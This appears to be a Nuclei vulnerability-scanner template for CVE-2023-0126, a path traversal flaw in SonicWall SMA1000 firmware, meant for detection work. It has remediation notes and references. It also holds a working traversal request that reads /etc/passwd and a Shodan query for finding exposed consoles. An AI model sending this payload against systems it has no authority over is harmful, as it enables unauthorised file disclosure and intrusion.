52 lines
1.6 KiB
YAML
52 lines
1.6 KiB
YAML
id: CVE-2023-0126
|
|
|
|
info:
|
|
name: SonicWall SMA1000 LFI
|
|
author: tess
|
|
severity: high
|
|
description: |
|
|
Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.
|
|
remediation: |
|
|
Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-0126
|
|
- https://github.com/advisories/GHSA-mr28-27qx-phg3
|
|
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0001
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2023-0126
|
|
cwe-id: CWE-22
|
|
epss-score: 0.03234
|
|
epss-percentile: 0.90154
|
|
cpe: cpe:2.3:o:sonicwall:sma1000_firmware:12.4.2:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: "true"
|
|
max-request: 1
|
|
vendor: sonicwall
|
|
product: sma1000_firmware
|
|
shodan-query: title:"Appliance Management Console Login"
|
|
tags: cve,cve2023,sonicwall,lfi,sma1000
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- content/unknown
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100d125a11c9cb522dc45ada9fe93dbb8987d5f8149a96935d64296592579ffea67022100f98e560f52377702b88f0f16e1ba9a1c00c1b3a2a407a141fec078ba1e2710c9:922c64590222798bb761d5b6d8e72950
|